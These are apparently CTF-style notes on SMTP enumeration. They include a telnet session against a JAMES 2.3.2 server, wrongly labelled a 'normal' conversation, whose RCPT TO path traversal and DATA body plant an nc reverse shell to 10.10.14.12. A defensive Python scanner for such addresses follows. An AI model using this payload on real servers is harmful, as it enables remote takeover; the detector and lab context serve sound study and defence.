SMTP Enumeration

What does SMTP stand for?

Simple Mail Transfer Protocol is an application layer protocol.

When a client wants to send mail, it opens a TCP connection to the SMTP server and then sends the message across that connection.

The SMTP server is by default always in LISTENING mode on port 25; the client connects to that port, and once the TCP connection is established the mail is transferred over it.

The only disadvantage of SMTP is that it cannot retrieve messages; it can only send, relay and forward them. By default it uses port 25, but it can also use ports 587 and 465 for TLS.

Example of a normal SMTP conversation

root@kali:~# telnet 10.10.10.51 25
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Mon, 30 Dec 2019 17:10:56 -0500 (EST)

EHLO bla.bla
250-solidstate Hello bla.bla (10.10.14.12 [10.10.14.12])
250-PIPELINING
250 ENHANCEDSTATUSCODES

MAIL FROM: <'random@random.com>
250 2.1.0 Sender <'random@random.com> OK

RCPT TO: <../../../../../../../../etc/bash_completion.d>
250 2.1.5 Recipient <../../../../../../../../etc/bash_completion.d@localhost> OK

DATA
354 Ok Send data ending with <CRLF>.<CRLF>
FROM: bla.bla
'
/bin/nc -e /bin/bash 10.10.14.12 1234
.
250 2.6.0 Message received
quit
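As an added example (not part of the original notes), the following Python check parses the client side of an SMTP session log and flags MAIL FROM / RCPT TO addresses carrying path or shell characters that a mailbox name should never contain. The pattern list and the sample transcript (built from the dialogue above) are my own constructed choices.

```python
import re

# SMTP commands that carry an address parameter worth inspecting.
ADDR_CMD = re.compile(r"^(MAIL FROM|RCPT TO):\s*<(.*)>\s*$", re.IGNORECASE)

# Constructed detection patterns: directory traversal, path separators and
# quote/shell metacharacters have no place in a mailbox local-part.
SUSPICIOUS = [
    ("path traversal", re.compile(r"\.\./")),
    ("path separator", re.compile(r"/")),
    ("quote character", re.compile(r"['\"`]")),
]


def inspect_address(addr):
    """Return the list of reasons an address looks hostile, or [] if clean."""
    return [name for name, pat in SUSPICIOUS if pat.search(addr)]


def scan_transcript(text):
    """Parse an SMTP transcript line by line and return
    (line_no, command, address, reasons) for every suspicious address."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        m = ADDR_CMD.match(line.strip())
        if not m:
            continue  # server replies, EHLO, DATA body etc. are skipped
        cmd, addr = m.group(1).upper(), m.group(2)
        reasons = inspect_address(addr)
        if reasons:
            findings.append((no, cmd, addr, reasons))
    return findings


# Constructed sample: the client commands from the session shown above,
# plus one ordinary recipient that should not be flagged.
SAMPLE = """EHLO bla.bla
MAIL FROM: <'random@random.com>
RCPT TO: <../../../../../../../../etc/bash_completion.d>
RCPT TO: <alice@example.com>
DATA
"""

if __name__ == "__main__":
    for no, cmd, addr, reasons in scan_transcript(SAMPLE):
        print(f"line {no}: {cmd} <{addr}> -> {', '.join(reasons)}")
```

The same function can be pointed at a mail server's command log to surface recipients that are really file paths rather than mailboxes.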
